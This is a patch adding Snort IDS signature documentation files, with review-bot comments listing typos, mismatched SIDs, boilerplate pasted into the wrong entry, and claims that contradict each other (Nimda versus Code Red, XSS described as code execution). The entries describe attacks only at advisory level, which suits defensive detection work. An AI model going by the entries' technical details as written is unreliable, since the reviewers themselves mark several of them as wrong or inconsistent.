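Review bot: almost every wrapped prose line in this file carries trailing whitespace ("remote file ", "webserver. ", "the ", "may also "), which should be stripped before commit. The content issues match the other generated "100000xxx" entries: the credential-validation paragraph and the "supply his/her own credentials" scenario do not describe a remote file include via the "func_prog" parameter and should be replaced by the file-include scenario; "ona" should be "on a", "attackers choosing" should be "attacker's choosing", "has been attempted" should be "has been made", the Sid and Affected Systems blocks lack the blank line before "--", and Additional References is empty.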
--- /dev/null
+++ b/doc/signatures/1298.txt
@@ -0,0 +1,52 @@
+Rule:
+
+Sid: 1289
+
+Summary:
+This event is generated when a TFTP GET request is made for Admin.dll.  This is normally an indication that a system on the network is infected with the W32/Nimda worm.
+
+Impact:
+In normal situations this is a good indication that the host transmitting the request has been compromised in the past by Code Red, Code Red II, or the sacmind/IIS worm.  All of these worms created backdoors that could allow remote attackers to run abitrary commands on the machine.
+
+Detailed Information:
+The Nimda worm propogates in several ways.  After it infects a host it begins scanning for other compromised hosts, sending infected emails, infecting .html files, and adding trojans to system binaries.  To further expose the infected system it enables sharing of the c: drive, creates a Guest account, and adds the guest account to the Administrators group.  
+
+Currently this rule searches for "Admin.dll" in TFTP GET requests.  This rule will detect hosts that have just been compromised by Nimba and are searching for Admin.dll to elevate its system privileges to Local/System.
+
+Affected Systems
+Windows 95
+Windows 98
+Windows ME
+Windows NT
+Windows 2000
+
+Attack Scenarios:
+Once W32/Nimba infects a compromised host it will make a request for "Admin.dll".  This binary file is used to elevate the privilege level of the W32/Nimba worm to Local/System, so it can begin infecting system files and other hosts.
+
+Ease of Attack:
+Simple.  Nimba uses backdoors left by other worms and trojans that target IIS.  A large number of scripts and exploits exist in the wild that mimic the behavior of the Nimba worm.
+
+False Positives:
+This rule is triggered by any TFTP GET request for Admin.dll, if this file name is being used during a legitimate TFTP session this rule will generate a false positive.
+
+False Negatives:
+This rule was created to catch the generic version of the W32/Nimba worm.  Any attacker who changes "Admin.dll" to a another filename will bypass this rule.
+
+Corrective Action:
+The host generating the request should be investigated for evidence of a compromise.  Check for the presence of root.exe, Admin.dll, and unexpected .eml or .nws files.  If it is determined that the system has been compromised the only safe way to recover the system is to format the system drives and re-install the system.  
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Matthew Watchinski Matt.Watchinski@sourcefire.com
+
+Additional References
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS01-044.asp
+
+CERT:
+http://www.cert.org/advisories/CA-2001-26.html
+http://www.cert.org/tech_tips/win-UNIX-system_compromise.html
+
+--
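Review bot: the Sid in the body ("Sid: 1289") does not match the file name (1298.txt); one of the two is wrong, and the mismatch would break any tooling that maps rule SIDs to their documentation file. The file also omits the "--" separators between sections that every other entry in this patch uses, and "Affected Systems" is missing its colon. The worm name alternates between "Nimda" (Summary, first Detailed Information paragraph) and "Nimba" (second Detailed Information paragraph, Attack Scenarios, Ease of Attack, False Negatives); use one spelling throughout. "sacmind/IIS worm" looks like a typo for the sadmind/IIS worm, "propogates" should be "propagates", and "abitrary" should be "arbitrary". The Impact paragraph talks about earlier Code Red compromise while the Summary says the host is infected with Nimda; Attack Scenarios has the clearer statement (a newly infected host requesting Admin.dll to elevate privileges) and the Impact text should be aligned with it.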
--- /dev/null
+++ b/doc/signatures/100000475.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000475
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "VBZoom" application running on a webserver. Access to the 
+file "meaning.php" with SQL commands being passed as the "ShowByQuranID" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "ShowByQuranID" parameter in the "meaning.php" script 
+used by the "VBZoom" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using VBZoom
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
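Review bot: the SQL injection paragraph in Detailed Information is a comma splice ("...compromise the database backend for the application, the attacker may also be able to..."), and the following paragraph about validating client credentials belongs to the generic CGI template rather than to an injection through the "ShowByQuranID" parameter; replace it with text describing the injection point. Most wrapped lines carry trailing whitespace, "ona" should be "on a", "attackers choosing" should be "attacker's choosing", and "has been attempted" should be "has been made". This file spells the application "VBZoom" while 100000824.txt in the same patch uses "VBZooM"; the documentation should settle on one spelling.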
--- /dev/null
+++ b/doc/signatures/2053.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+2053
+
+--
+Summary:
+Versions of the software tracking system Bugzilla prior to 2.14.1 are 
+prone to a vulnerability that allows some degree of account hijacking.
+
+--
+Impact:
+False data may be represented in the bug tracking database.
+
+--
+Detailed Information:
+Versions of Bugzilla prior to 2.14.1 and cvs version 2.15 prior to 
+20020103 allow non-authorized users to post comments as any user of 
+their choosing, including non-valid usernames.
+
+A check to verify the user is valid when posting comments is not 
+performed correctly. Using this an attacker might post comments as 
+another user in the bugzilla database.
+
+--
+Affected Systems:
+Bugzilla versions prior to 2.14.1 and cvs versions prior to 2.15 (cvs20020103)
+
+--
+Attack Scenarios:
+The attacker can manually edit the page to pass his own version of 
+variables to the script handling the comments. This script in turn 
+passes the data directly to another script that handles the posting of 
+bugs without checking the user database.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade Bugzilla to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0008
+
+Bugzilla:
+http://www.bugzilla.org/security/2.14.1/
+http://bugzilla.mozilla.org/show_bug.cgi?id=108385
+http://bugzilla.mozilla.org/show_bug.cgi?id=108516
+
+--
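Review bot: the Summary never says what traffic the rule matches; the other entries open with "This event is generated when ...", and this one should name the request the rule looks for (the comment-posting script described under Attack Scenarios) so an analyst can judge the "None Known" false-positive claim. The Affected Systems line ("cvs versions prior to 2.15 (cvs20020103)") and the Detailed Information ("cvs version 2.15 prior to 20020103") describe the same cut-off two different ways; pick one wording. Trailing whitespace on the wrapped lines ("are ", "to ", "as ") should be stripped, and "False data may be represented in the bug tracking database" reads better as "False data may be entered into the bug tracking database".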
--- /dev/null
+++ b/doc/signatures/861.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+861
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
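Review bot: this is the generic CGI template with no indication of which application or script SID 861 actually matches; "a known vulnerability in a CGI web application" plus an empty Additional References gives an analyst nothing to verify, so the target script name and an advisory should be added. Minor: "ona" should be "on a", "attackers choosing" should be "attacker's choosing", the line "relationships between the victim server and other hosts can be exploited by the attacker." overruns the wrap width used elsewhere in the file, and the wrapped Summary lines carry trailing whitespace.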
--- /dev/null
+++ b/doc/signatures/920.txt
@@ -0,0 +1,62 @@
+SID:
+920
+--
+
+Rule:
+--
+
+Summary:
+This even indicates an attempt to exploit undocumented CFML tags on a 
+Allaire ColdFusion Server
+--
+
+Impact:
+Extensive server data retrieval including settings and passwords
+--
+
+Detailed Information:
+Undocumented CFML tags allow reading and decryption of sensitive data 
+contained on servers running Allaire ColdFusion Server 2.0 - 4.0.1. This
+data can be accesses by constructing a hosted application that accesses 
+these undocumented tags with the possibility of changing values on the 
+server and reading admin and studio passwords
+--
+
+Affected Systems:
+	Allaire ColdFusion Server 2.0 - 4.0.1
+--
+
+Attack Scenarios:
+A user with permission to create pages on the server installs an 
+application that accesses the undocumented CFML tags, accessing this 
+application would allow viewing and possible modifications of these 
+settings
+--
+
+Ease of Attack:
+Medium, Attackers need the ability to add files to the server. No "In 
+the Wild" exploits were available at type of writing
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Patches are available from Allaire, install them.
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
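Review bot: this file's section order (SID first, then an empty Rule block) and its closing heading "References:" differ from the "Rule: / Sid: / ... / Additional References:" layout every other file in the patch uses, and "SID" uses different capitalisation from "Sid"; normalise it so the sections can be parsed the same way as the rest. Typos: "This even indicates" (event), "a Allaire ColdFusion Server" (an Allaire), "can be accesses" (accessed), "at type of writing" (time of writing), and "Medium, Attackers need" should be "Medium. Attackers need". "Patches are available from Allaire, install them." should name or link the vendor advisory, and the References section is empty.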
--- /dev/null
+++ b/doc/signatures/152.txt
@@ -0,0 +1,103 @@
+Rule:
+
+--
+Sid:
+152, 157-158
+
+--
+Summary:
+Backdoor.Backconstruction is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files
+and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Backconstruction
+sever to programs normally started on boot. Due to the nature of this
+Trojan it is unlikely that the attacker's client IP address has been
+spoofed.
+
+	SID	Message
+	---	-------
+	152	BackConstruction 2.1 Connection (outgoing TCP
+connection)
+	157	BackConstruction 2.1 Client FTP Open Request (incoming
+TCP connection)
+	158	BackConstruction 2.1 Server FTP Open Reply (outging TCP
+connection)
+
+This Trojan is commonly used to install other Trojan programs.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise can be in the form of a Win32 installation program that may
+use the extension ".jpg" or ".bmp" when delivered via e-mail for
+example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+Updated virus definition files are essential in detecting this Trojan.
+
+The Trojan server is located at <drive>:\WINDOWS\Cmctl32.exe
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a
+previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Shell = "<drive>:\WINDOWS\Cmctl32.exe"
+
+Removal of this entry is required.
+
+Delete the file <drive>:\WINDOWS\Cmctl32.exe
+
+Ending the Trojan process is also necessary. A reboot of the infected
+machine is recommended.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS505
+
+Dark-e:
+http://www.dark-e.com/archive/trojans/backc/21/index.shtml
+
+Pest Patrol:
+www.pestpatrol.com/PestInfo/b/back_construction.asp
+
+--
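Review bot: the SID/Message table in Detailed Information is broken by line wrapping: each of the three rows is split so that "connection)", "TCP connection)" and "connection)" begin their own unindented lines, which makes the table unreadable as plain text; shorten the messages or let those lines run long. Typos: "sever" (server) and "outging" (outgoing). The path "<drive>:\WINDOWS\Cmctl32.exe" sits under Ease of Attack, where it says nothing about difficulty; it belongs with the registry details in Corrective Action, where it is already repeated. The operating system list should go under an "Affected Systems:" heading, which this file lacks, and the Pest Patrol reference is missing its "http://" scheme.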
--- /dev/null
+++ b/doc/signatures/1760.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1760
+
+--
+Summary:
+This event is generated when network traffic indicating the use of an
+IDS system on the protected network is detected.
+
+--
+Impact:
+These tools may be used to compromise data on the network or may
+indicate mis-use of other IDS systems.
+
+--
+Detailed Information:
+This event indicates the use of an IDS tool. The source of the event
+should be investigated carefully. These tools may be used to gather data
+present in traffic on the protected network.
+
+--
+Affected Systems:
+	All networks.
+
+--
+Attack Scenarios:
+An unathorized user could use an IDS to gather data and observe traffic
+present on the network.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
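Review bot: the Corrective Action section is empty, and neither the Summary nor Detailed Information says which IDS tool or traffic pattern SID 1760 matches ("network traffic indicating the use of an IDS system"); an analyst cannot act on this without knowing what was detected. At a minimum, Corrective Action should say to identify the source host and confirm whether the sensor is sanctioned, and Additional References should cite the tool's documentation. Typo: "unathorized" (unauthorized).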
--- /dev/null
+++ b/doc/signatures/2240.txt
@@ -0,0 +1,62 @@
+Rule:  
+
+--
+Sid:
+2240
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in PDGSoft Shopping Cart.
+
+--
+Impact:
+Serious. Execution of arbitrary code is possible.
+
+--
+Detailed Information:
+Certain versions of PDGSoft Shopping Cart suffer from a buffer overflow 
+condition that can present an attacker with the opportunity to execute 
+arbitrary code of their choosing.
+
+The vulnerable executable files are redirect.exe and changepw.exe, which
+can be accessed via the web interface.
+
+--
+Affected Systems:
+	PDGSoft Shopping Cart 1.50
+
+--
+Attack Scenarios:
+The attacker needs to supply an overly long string to either of the 
+affected executables.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1256
+
+--
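Review bot: "Rule:  " and the "-- " before Additional References carry trailing whitespace, as do the wrapped lines in Summary and Detailed Information ("known ", "overflow ", "execute "). One point to confirm before merging: Ease of Attack says "No exploit software required" while Impact claims "Execution of arbitrary code is possible"; an overly long string, as described under Attack Scenarios, will crash the executable, but code execution needs crafted input, so the wording should distinguish the denial-of-service case from arbitrary code execution.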
--- /dev/null
+++ b/doc/signatures/283.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid: 283
+
+--
+Summary:
+Versions of the Netscape browser including and prior to 4.75 are vulnerable to a buffer overflow that may lead to a root shell listening on port 6968. This event is generated when a request is made to a web site exploiting this vulnerability.
+
+--
+Impact:
+System compromize presenting the attacker with the opportunity to
+gain remote access to the victim host.
+
+--
+Detailed Information:
+A buffer overflow condition exists in the HTML parser on some versions of Netscape Navigator. It is possible for a remote attacker to gain a root shell on the victim host.
+
+A long password value in a form field may result in an attacker being able to execute arbitrary commands.
+
+Affected Systems:
+	Netscape Navigator 4.75 and prior
+
+--
+Attack Scenarios:
+The attacker would need to supply a link on a web page or HTML email that triggers the overflow.
+
+Exploit scripts are available
+
+--
+Ease of Attack:
+Simple. Exploits are available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1189
+
+Arachnids:
+http://www.whitehats.com/info/IDS215
+
+Bugtraq:
+http://www.securityfocus.com/bid/822
+
+--
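Review bot: the "--" separator is missing between Detailed Information and Affected Systems (the "Affected Systems:" heading directly follows the form-field paragraph), and "Sid: 283" is written on one line whereas the other files put the number on the following line; both break consistent parsing. Typo: "compromize" (compromise). The Summary's "may lead to a root shell listening on port 6968" describes one exploit's behaviour rather than the vulnerability itself, so it fits better under Attack Scenarios next to "Exploit scripts are available" (which also needs a terminating period).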
--- /dev/null
+++ b/doc/signatures/3373.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3373
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
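Review bot: the Attack Scenarios text ("a request for a file with an overly long filename via a network share") does not match Detailed Information, which describes a malformed DCOM request sent to an RPC port; the scenario appears to have been copied from a different entry and should describe the RPC/DCOM request. Typo: "Expoit code exists" (Exploit). Corrective Action lists ports 135, 139 and 445 for TCP and UDP; 135 is the RPC endpoint mapper while 139 and 445 are the NetBIOS/SMB transports over which DCOM can also be reached, and a sentence saying so would help the reader understand why all three are blocked. Additional References is empty even though this is a well-known vendor-patched issue; the Microsoft bulletin should be cited.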
--- /dev/null
+++ b/doc/signatures/2747.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2747
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure begin_flavor_definition
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
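Review bot: the last Detailed Information paragraph is broken mid-sentence: "vulnerability in the procedure begin_flavor_definition" is followed by a line beginning ". This procedure is included in" and then "dbms_repcat." alone on the next line, which looks like a template substitution that was never reflowed. Suggest "vulnerability in the procedure begin_flavor_definition. This procedure is included in dbms_repcat." Also "Oracle Oracle9i" under Affected Systems repeats the vendor name, "None Known" should match the "None known." used in the other files, "Apply the appropriate vendor supplied patch" lacks a period, and Additional References is empty.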
--- /dev/null
+++ b/doc/signatures/1194.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1194
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
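Review bot: typo in Detailed Information, "running ona web server" should read "on a web server", and "the attackers choosing" (Impact and Detailed Information) needs the possessive "attacker's". The whole file is generic boilerplate ("a CGI web application running on a server") and Additional References is empty, so a reader cannot tell which CGI script SID 1194 actually matches; suggest naming the script in the Summary and adding a reference.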
--- /dev/null
+++ b/doc/signatures/100000846.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000846
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Subberz Lite" application running on a webserver. Access to the file "user-func.php" using a remote file being passed as the "myadmindir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "myadmindir" parameter in the "user-func.php" script used by the "Subberz Lite" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Subberz Lite
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
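Review bot: this file's formatting diverges from the template used by the rest of the patch: it opens with two blank lines, ends with a stray blank line after the final "--", and the "--" separators after "Sid:" and after "Affected Systems:" lack the blank line every other file puts before them. In the text, "an exploitation attempt has been attempted" is redundant (suggest "an exploitation attempt has been made"), and "running ona web server" should be "on a web server". The third Detailed Information paragraph and the Attack Scenarios paragraph discuss credential checks on a CGI authentication mechanism, which is unrelated to the remote file include via the "myadmindir" parameter this rule detects; suggest dropping or rewriting them. Additional References is empty.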
--- /dev/null
+++ b/doc/signatures/1291.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1291
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
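Review bot: the text never identifies what SID 1291 matches; Summary, Detailed Information and Attack Scenarios are all generic web-server boilerplate ("Many known vulnerabilities exist for each implementation and the attack scenarios are legion") and Additional References is empty. Suggest naming the URI or resource the rule looks for and adding a reference. Minor: "the attackers choosing" under Impact should be "the attacker's choosing".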
--- /dev/null
+++ b/doc/signatures/1645.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1645
+
+--
+Summary:
+This event is generated when an attempt is made to access /testcgi on a 
+web server. This may indicate an attempt to exploit a cross-site 
+scripting vulnerability that affects Ceilidh.
+
+--
+Impact:
+Arbitrary code execution, possible session hijack.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a 
+cross-site scripting vulnerability in Ceilidh, web-based discussion 
+software released by Lilikoi Software, Inc. An attacker can craft a URL 
+that passes malicious code to testcgi.exe. If a legitimate user 
+activates the URL, malicious code may be executed on the client 
+computer.
+
+--
+Affected Systems:
+All web servers that Ceilidh 2.6 or 2.7 are vulnerable.
+All clients that access Ceilidh 2.6 or 2.7 are vulnerable.
+
+--
+Attack Scenarios:
+An attacker may craft a script that obtains the user's session cookie, 
+thereby allowing the attacker to pose as the user for the duration of 
+the session.
+
+--
+Ease of Attack:
+Simple. A proof of concept exists.
+
+--
+False Positives:
+If a legitimate remote user accesses testcgi.exe, this rule may generate
+an event. 
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Sourcefire Technical Publications Team
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/7214
+
+Nessus
+http://cgi.nessus.org/plugins/dump.php3?id=11610
+
+--
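Review bot: Summary and Detailed Information disagree on the matched resource: Summary says "/testcgi" while Detailed Information and False Positives say "testcgi.exe"; make them consistent with what the rule actually matches. "All web servers that Ceilidh 2.6 or 2.7 are vulnerable." is missing a verb (suggest "All web servers running Ceilidh 2.6 or 2.7 are vulnerable."). The Impact line "Arbitrary code execution" overstates a cross-site scripting issue; Detailed Information itself says "malicious code may be executed on the client computer", so "Client-side script execution, possible session hijack." would describe the risk more accurately.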
--- /dev/null
+++ b/doc/signatures/1654.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1654
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
